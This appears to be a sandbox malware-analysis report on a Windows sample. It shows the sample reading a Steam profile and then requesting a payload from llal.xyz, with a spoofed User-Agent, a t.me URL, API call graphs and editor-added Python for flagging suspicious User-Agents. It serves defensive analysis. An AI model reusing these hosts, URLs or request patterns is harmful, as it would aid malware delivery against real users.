Jan 1, 2025 09:06:58.275908947 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:58.275914907 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.275928020 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:58.275962114 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:58.280996084 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.281055927 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:58.285590887 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.285636902 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.285645008 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:58.285697937 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:58.285969973 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:58.285979033 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.392661095 CET  49731        443        192.168.2.4     188.114.97.3
Jan 1, 2025 09:06:58.392715931 CET  443          49731      188.114.97.3    192.168.2.4
Jan 1, 2025 09:06:58.392791986 CET  49731        443        192.168.2.4     188.114.97.3
Jan 1, 2025 09:06:58.393271923 CET  49731        443        192.168.2.4     188.114.97.3
Jan 1, 2025 09:06:58.393289089 CET  443          49731      188.114.97.3    192.168.2.4
Jan 1, 2025 09:06:58.946261883 CET  443          49731      188.114.97.3    192.168.2.4
Jan 1, 2025 09:06:58.946322918 CET  49731        443        192.168.2.4     188.114.97.3
Jan 1, 2025 09:06:59.034507990 CET  49731        443        192.168.2.4     188.114.97.3
Jan 1, 2025 09:06:59.034538031 CET  443          49731      188.114.97.3    192.168.2.4
Jan 1, 2025 09:06:59.034729958 CET  443          49731      188.114.97.3    192.168.2.4
Jan 1, 2025 09:06:59.034790993 CET  49731        443        192.168.2.4     188.114.97.3
Jan 1, 2025 09:06:59.076704979 CET  49731        443        192.168.2.4     188.114.97.3
Jan 1, 2025 09:06:59.123327017 CET  443          49731      188.114.97.3    192.168.2.4
Jan 1, 2025 09:06:59.267857075 CET  443          49731      188.114.97.3    192.168.2.4
Jan 1, 2025 09:06:59.267899990 CET  443          49731      188.114.97.3    192.168.2.4
Jan 1, 2025 09:06:59.267911911 CET  49731        443        192.168.2.4     188.114.97.3
Jan 1, 2025 09:06:59.267946005 CET  49731        443        192.168.2.4     188.114.97.3
Jan 1, 2025 09:06:59.431689024 CET  49731        443        192.168.2.4     188.114.97.3
Jan 1, 2025 09:06:59.431735039 CET  443          49731      188.114.97.3    192.168.2.4
Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Jan 1, 2025 09:06:56.983930111 CET  56884        53         192.168.2.4  1.1.1.1
Jan 1, 2025 09:06:56.990803003 CET  53           56884      1.1.1.1      192.168.2.4
Jan 1, 2025 09:06:58.359020948 CET  63380        53         192.168.2.4  1.1.1.1
Jan 1, 2025 09:06:58.381963015 CET  53           63380      1.1.1.1      192.168.2.4
Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Jan 1, 2025 09:06:56.983930111 CET  192.168.2.4  1.1.1.1  0xb57     Standard query (0)  steamcommunity.com  A (IP address)  IN (0x0001)  false
Jan 1, 2025 09:06:58.359020948 CET  192.168.2.4  1.1.1.1  0x8960    Standard query (0)  llal.xyz            A (IP address)  IN (0x0001)  false
Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
Jan 1, 2025 09:06:56.990803003 CET  1.1.1.1    192.168.2.4  0xb57     No error (0)  steamcommunity.com  -      104.102.49.254  A (IP address)  IN (0x0001)  false
Jan 1, 2025 09:06:58.381963015 CET  1.1.1.1    192.168.2.4  0x8960    No error (0)  llal.xyz            -      188.114.97.3    A (IP address)  IN (0x0001)  false
Jan 1, 2025 09:06:58.381963015 CET  1.1.1.1    192.168.2.4  0x8960    No error (0)  llal.xyz            -      188.114.96.3    A (IP address)  IN (0x0001)  false
• steamcommunity.com
• llal.xyz
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49730        104.102.49.254  443               7504  C:\Users\user\Desktop\OXoeX1Ii3x.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-01 08:06:57 UTC  206                OUT
  GET /profiles/76561199619938930 HTTP/1.1
  User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
  Host: steamcommunity.com
  Cache-Control: no-cache
2025-01-01 08:06:58 UTC  1905               IN
  HTTP/1.1 200 OK
  Server: nginx
  Content-Type: text/html; charset=UTF-8
  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
  Expires: Mon, 26 Jul 1997 05:00:00 GMT
  Cache-Control: no-cache
  Date: Wed, 01 Jan 2025 08:06:58 GMT
  Content-Length: 35137
  Connection: close
  Set-Cookie: sessionid=9e2c37b57a41d76591d59548; Path=/; Secure; SameSite=None
  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-01 08:06:58 UTC  14479              IN
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-01 08:06:58 UTC  16384              IN
  Data Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
  Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
2025-01-01 08:06:58 UTC  3768               IN
  Data Raw: 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75
  Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actu
2025-01-01 08:06:58 UTC  506                IN
  Data Raw: 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09
  Data Ascii: >Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link">


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49731        188.114.97.3    443               7504  C:\Users\user\Desktop\OXoeX1Ii3x.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-01 08:06:59 UTC  210                OUT
  GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1
  User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
  Host: llal.xyz
  Cache-Control: no-cache
2025-01-01 08:06:59 UTC  951                IN
  HTTP/1.1 521
  Date: Wed, 01 Jan 2025 08:06:59 GMT
  Content-Type: text/plain; charset=UTF-8
  Content-Length: 15
  Connection: close
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VfhATMRDtVM3VPsEddEfg750%2FX7jukGcMbWpuSdbNXFC%2B2Lu8g%2BA1EJvFe%2BjG5krIlWbbK8mwF4YB7kA%2BWcs57WQnB5ckvN4iT0tv8rM8fYbrSDtePPLTdI5Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  X-Frame-Options: SAMEORIGIN
  Referrer-Policy: same-origin
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  Server: cloudflare
  CF-RAY: 8fb1035b9a7741de-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=52860&min_rtt=1809&rtt_var=30960&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2814&recv_bytes=848&delivery_rate=1614151&cwnd=225&unsent_bytes=0&cid=b9ea8cea6d35744e&ts=327&x=0"
                                                                                                                                                                                              2025-01-01 08:06:59 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                                                                                                                                                                              Data Ascii: error code: 521
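The 521 is Cloudflare's "origin web server is down" status, so the sandbox received no payload from llal.xyz; what the capture does give is the sample's User-Agent, and its tokens do not fit together. A genuine Chrome build emits identical AppleWebKit/ and Safari/ version tokens, and Chrome on desktop Linux reports its platform as "(X11; Linux x86_64)", not "(Linux x86_64)". The Python below is an added example by the editor, not part of the Joe Sandbox report or of the sample: the two consistency checks are the editor's heuristic, the tab-separated log record format is assumed, and the log lines are constructed (one reuses the Host and User-Agent from the capture above).

```python
"""Flag browser-impersonating User-Agent strings in HTTP log records.

Heuristic (editor's, not a Joe Sandbox signature): a UA that claims to be
Chrome must carry matching AppleWebKit/ and Safari/ version tokens, and a
Linux platform token must be the X11 form unless it is Android.
"""
import re
from dataclasses import dataclass, field

WEBKIT_RE = re.compile(r"AppleWebKit/([\d.]+)")
SAFARI_RE = re.compile(r"Safari/([\d.]+)")
CHROME_RE = re.compile(r"Chrome/([\d.]+)")
PLATFORM_RE = re.compile(r"^Mozilla/5\.0 \(([^)]*)\)")

# User-Agent taken from the captured request to llal.xyz above.
SAMPLE_UA = ("Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) "
             "Chrome/50.0.2598.249 Safari/603")

# Constructed, well-formed UAs used as negative controls.
KNOWN_GOOD_UAS = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/120.0.0.0 Mobile Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
)

# Constructed log records: timestamp, host, status, User-Agent, tab-separated.
SAMPLE_LOG = [
    "# ts\thost\tstatus\tuser-agent",
    f"2025-01-01T08:06:59Z\tllal.xyz\t521\t{SAMPLE_UA}",
    f"2025-01-01T08:07:10Z\tupdate.example.test\t200\t{KNOWN_GOOD_UAS[0]}",
    f"2025-01-01T08:07:12Z\tcdn.example.test\t200\t{KNOWN_GOOD_UAS[1]}",
    f"2025-01-01T08:07:15Z\tnews.example.test\t200\t{KNOWN_GOOD_UAS[2]}",
]


@dataclass
class UAVerdict:
    ua: str
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def check_user_agent(ua: str) -> UAVerdict:
    """Return the consistency violations found in a Chrome-style UA."""
    verdict = UAVerdict(ua)
    chrome = CHROME_RE.search(ua)
    if not chrome:
        return verdict  # heuristic only covers UAs that claim to be Chrome
    webkit = WEBKIT_RE.search(ua)
    safari = SAFARI_RE.search(ua)
    if webkit and safari:
        if webkit.group(1) != safari.group(1):
            verdict.reasons.append(
                f"AppleWebKit/{webkit.group(1)} does not match Safari/{safari.group(1)}")
    else:
        verdict.reasons.append("Chrome token without paired AppleWebKit/Safari tokens")
    plat = PLATFORM_RE.match(ua)
    if plat:
        platform = plat.group(1)
        if "Linux" in platform and "X11" not in platform and "Android" not in platform:
            verdict.reasons.append(f"Linux platform token without X11: ({platform})")
    if chrome.group(1).count(".") != 3:
        verdict.reasons.append(f"Chrome version is not four-part: {chrome.group(1)}")
    return verdict


def scan_log(lines) -> list[tuple[str, UAVerdict]]:
    """Return (host, verdict) for each record whose UA trips a check."""
    hits = []
    for line in lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t", 3)
        if len(parts) != 4:
            continue  # malformed record, skip rather than guess
        _ts, host, _status, ua = parts
        verdict = check_user_agent(ua)
        if verdict.suspicious:
            hits.append((host, verdict))
    return hits


if __name__ == "__main__":
    for host, verdict in scan_log(SAMPLE_LOG):
        print(host)
        for reason in verdict.reasons:
            print("  -", reason)
```

Run against the constructed log, only the llal.xyz record is reported, with two reasons: the AppleWebKit/600.48 vs Safari/603 mismatch and the non-X11 Linux platform token. The checks are deliberately narrow so a proxy log full of real Chrome, Android and Firefox traffic stays quiet.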


Target ID: 0
Start time: 03:06:55
Start date: 01/01/2025
Path: C:\Users\user\Desktop\OXoeX1Ii3x.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\OXoeX1Ii3x.exe"
Imagebase: 0x140000
File size: 378,368 bytes
MD5 hash: 3E9881B9C6FF4994FC9D684456694E77
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 03:06:58
Start date: 01/01/2025
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7504 -s 2016
Imagebase: 0x890000
File size: 483,680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.7%
Total number of Nodes: 728
Total number of Limit Nodes: 3
execution_graph (node/edge dump of the interactive graph; only the Windows API nodes it contains are kept here, with the node addresses the report gives and the caller visible in the edges)

  14627f  InternetOpenA                   in 1461c0, reached from 157be1
  1574b8  InternetOpenUrlA                in 1573cd, reached from 157be1
  157590  InternetReadFile                in 1573cd, loops back to 157571 after InternetOpenUrlA
  157fda  FindWindowA                     in 157be1
  158405  ExitProcess                     in 157be1
  15c2c6  GetPEB                          in 15c2b7, called from both 1461c0 and 1573cd
  15c272  WideCharToMultiByte             in 15c2b7
  15f845  GetSystemTimePreciseAsFileTime  in 15f815, via 15da56 from 157aaa
  15f851  GetSystemTimeAsFileTime         in 15f815 (alternate branch)
  15ca69  IsProcessorFeaturePresent       in 15ca60
  15ca6e  SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
  15d1df  IsProcessorFeaturePresent       in 15cd11, from 15d012
  160345  KiUserExceptionDispatcher       in 1602fe (Concurrency::cancel_current_task path)
  16bd82  EnterCriticalSection, LeaveCriticalSection (std::_Facet_Register)
  1718b5  RtlAllocateHeap                 in 165bb8 / 17188c
  170309  RtlFreeHeap                     in 1702fe
  17031e  GetLastError                    in 1702fe, after RtlFreeHeap
33941 169bf9 33915->33941 33918 14ce70 33919 14ceaa 33918->33919 33920 14ce89 33918->33920 33926 14ceb1 33919->33926 33932 14cee3 33919->33932 33991 14dc05 41 API calls 33919->33991 33988 14dc05 41 API calls 33920->33988 33923 14ce8e 33923->33919 33989 14dc05 41 API calls 33923->33989 33925 14ce9c 33925->33926 33990 14dc05 41 API calls 33925->33990 33928 15ca60 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33926->33928 33930 14d08d 33928->33930 33929 14cf4a 33931 14cfea 33929->33931 33935 14cf53 33929->33935 33930->33845 33933 14cf69 33931->33933 33936 14d01e 33931->33936 33932->33926 33932->33929 33938 14dc05 41 API calls 33932->33938 33933->33926 33992 14d270 44 API calls 2 library calls 33933->33992 33935->33926 33935->33933 33939 14cfc1 33935->33939 33936->33926 33994 14d235 41 API calls 33936->33994 33938->33932 33993 14d5be 41 API calls 33939->33993 33946 1713a9 GetLastError 33941->33946 33947 1713bf 33946->33947 33948 1713c5 33946->33948 33979 172028 6 API calls __Getctype 33947->33979 33952 1713c9 33948->33952 33980 172067 6 API calls __Getctype 33948->33980 33951 1713e1 33951->33952 33953 1713e9 33951->33953 33954 17144e SetLastError 33952->33954 33981 1702a1 14 API calls 3 library calls 33953->33981 33957 17145e 33954->33957 33958 169c04 33954->33958 33956 1713f6 33959 17140f 33956->33959 33960 1713fe 33956->33960 33986 16fac6 39 API calls __purecall 33957->33986 33975 172316 33958->33975 33983 172067 6 API calls __Getctype 33959->33983 33982 172067 6 API calls __Getctype 33960->33982 33965 17140c 33971 1702fe ___free_lconv_mon 14 API calls 33965->33971 33966 17141b 33967 171436 33966->33967 33968 17141f 33966->33968 33985 1711d7 14 API calls __Wcrtomb 33967->33985 33984 172067 6 API calls __Getctype 33968->33984 33973 171433 33971->33973 33972 171441 33974 1702fe ___free_lconv_mon 14 API calls 33972->33974 33973->33954 33974->33973 33976 172329 33975->33976 33978 14e160 33975->33978 33976->33978 
33987 178421 39 API calls 4 library calls 33976->33987 33978->33918 33979->33948 33980->33951 33981->33956 33982->33965 33983->33966 33984->33965 33985->33972 33987->33978 33988->33923 33989->33925 33990->33919 33991->33919 33992->33926 33993->33926 33994->33926 33996 14f11e __EH_prolog3_GS 33995->33996 33997 14a85f std::ios_base::_Init 41 API calls 33996->33997 33998 14f93d 33997->33998 33999 14cba6 46 API calls 33998->33999 34000 14f955 33999->34000 34001 14efdd 41 API calls 34000->34001 34002 14f973 34001->34002 34003 14cce6 46 API calls 34002->34003 34004 14f988 34003->34004 34005 14fa63 41 API calls 34004->34005 34006 14f996 34005->34006 34007 14ac78 std::ios_base::_Init 39 API calls 34006->34007 34008 14f9a4 34007->34008 34027 145f62 14 API calls 2 library calls 34008->34027 34010 14f9b3 34011 14ac78 std::ios_base::_Init 39 API calls 34010->34011 34012 14f9c2 34011->34012 34013 14ac78 std::ios_base::_Init 39 API calls 34012->34013 34014 14f9ce 34013->34014 34015 14f9e8 34014->34015 34016 14be69 std::ios_base::_Init 39 API calls 34014->34016 34017 17fc49 5 API calls 34015->34017 34016->34015 34018 14f9fc 34017->34018 34018->33850 34019->33856 34020->33862 34021->33902 34022->33908 34023->33881 34024->33858 34025->33897 34026->33857 34027->34010 34029 15787c __EH_prolog3_catch 34028->34029 34030 157985 _Yarn std::ios_base::_Init 34029->34030 34031 1578d9 34029->34031 34032 157a6a 34029->34032 34030->33700 34034 14fa93 std::ios_base::_Init 41 API calls 34031->34034 34043 14b2c0 41 API calls std::ios_base::_Init 34032->34043 34040 157910 _Yarn 34034->34040 34042 1500c0 39 API calls std::ios_base::_Init 34040->34042 34042->34030

Control-flow Graph

APIs
  • Part of subcall function 0015C2B7: __EH_prolog3_GS.LIBCMT ref: 0015C2C1
  • Part of subcall function 0015C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
• InternetOpenUrlA.WININET ref: 0015753F
• InternetReadFile.WININET ref: 00157590
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: Internet$FileH_prolog3_H_prolog3_catch_OpenRead
• String ID: 789593363246702628$8045878863314484420$9351356959942806932$Kernel32.dll$Wininet.dll
• API String ID: 3547353422-2454429382
• Opcode ID: 2d9fd9e3ea465b77081bb94459d31e1e57abeff86f080d94bd49b6dc3f9bfa49
• Instruction ID: a23e886e3bdc1fd4cc0660365a77cfeab2ccff68398068f79be80f0631cba9c1
• Opcode Fuzzy Hash: 2d9fd9e3ea465b77081bb94459d31e1e57abeff86f080d94bd49b6dc3f9bfa49
• Instruction Fuzzy Hash: DE514E70A00258EFDB20DF14CD49B9DBBB9FB08711F0040A9F949A7291D7B49E84CFA1

Control-flow Graph

(control_flow_graph 0: entry block 157be1-157c55, which among its internal calls reaches 1461c0, the InternetOpenA routine listed further below. Blocks that call external APIs: 157fcb-1580a8 FindWindowA; 158405-158407 ExitProcess, the terminal block reached from 1583a5-1583da and 1583dc-158400. Every other node is an internal call; the node/edge list is omitted.)
APIs
• __EH_prolog3_GS.LIBCMT ref: 00157BEB
  • Part of subcall function 00157AAA: __EH_prolog3_GS.LIBCMT ref: 00157AB1
  • Part of subcall function 00157AAA: __Xtime_get_ticks.LIBCPMT ref: 00157AC3
  • Part of subcall function 00157AAA: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00157AD0
  • Part of subcall function 001461C0: __EH_prolog3_GS.LIBCMT ref: 001461C7
  • Part of subcall function 001461C0: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0014629D
• FindWindowA.USER32(Hello,World), ref: 00157FE8
  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
  • Part of subcall function 0014A568: __EH_prolog3_GS.LIBCMT ref: 0014A56F
  • Part of subcall function 00155726: __EH_prolog3.LIBCMT ref: 0015572D
  • Part of subcall function 00155040: __EH_prolog3_GS.LIBCMT ref: 0015504A
  • Part of subcall function 00155040: GetNativeSystemInfo.KERNEL32(?,x86,00000000), ref: 00155155
  • Part of subcall function 0015AD7E: __EH_prolog3.LIBCMT ref: 0015AD85
• ExitProcess.KERNEL32 ref: 00158407
  • Part of subcall function 00149FC4: __EH_prolog3.LIBCMT ref: 00149FCB
  • Part of subcall function 00149A90: __EH_prolog3_GS.LIBCMT ref: 00149A9A
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_$H_prolog3$ExitFindInfoInternetNativeOpenProcessSystemUnothrow_t@std@@@WindowXtime_get_ticks__ehfuncinfo$??2@
• String ID: .$/ujs/$1735725939$Hello$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603$World$brCH$brGk$exG$fnc$https://$https://t.me/asdfghjrrewqqqqtfg$ostr$str
• API String ID: 1170277527-2651802916
• Opcode ID: ede89361751443d3006e28c30b3057e507fdbb546fa0059f33ef9c70331fd05b
• Instruction ID: 06750380b16168d8d0ccc552363b208fcfaa3ad385435695d7ecb760d04afa8e
• Opcode Fuzzy Hash: ede89361751443d3006e28c30b3057e507fdbb546fa0059f33ef9c70331fd05b
• Instruction Fuzzy Hash: EA32DF31D05298EADF05FBA4C986BEDBBB8AF25300F5440D9E4057B192DB745F48CBA2
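Taken together, the two routines documented in this report (the InternetOpenA wrapper at 0x1461c0 that feeds the InternetOpenUrlA/InternetReadFile loop, and the 0x157be1 caller that also reaches FindWindowA("Hello","World"), GetNativeSystemInfo and ExitProcess) are the sample's download path as the sandbox recovered it. The Python below is an added triage example, not code from Joe Sandbox or from the sample: it runs a handful of static heuristics over exactly the API names and string literals the report lists, flagging the WinINet fetch chain, the hard-coded https://t.me/ URL, a User-Agent that claims Linux inside a Windows PE, the 15-20 digit decimal literals that sit beside "Kernel32.dll" and "Wininet.dll", and the literal 1735725939 read as a Unix timestamp. The input lists are constructed from the report's API ID and String ID lines; treating the long decimals as encoded identifiers and the 10-digit literal as a timestamp are assumptions the report does not confirm.

```python
"""Static triage heuristics over API names and string literals recovered from a sample.

Added example for this report page, not Joe Sandbox or sample code. Inputs are constructed
from the report's API ID / String ID lines for 0x157be1, 0x1461c0 and the WinINet read loop.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Constructed from the report (API ID lines); nothing is read from the binary here.
SAMPLE_APIS = [
    "InternetOpenA", "InternetOpenUrlA", "InternetReadFile", "FindWindowA",
    "GetNativeSystemInfo", "ExitProcess", "GetSystemTimePreciseAsFileTime",
]
# Constructed from the report (String ID lines of the three functions).
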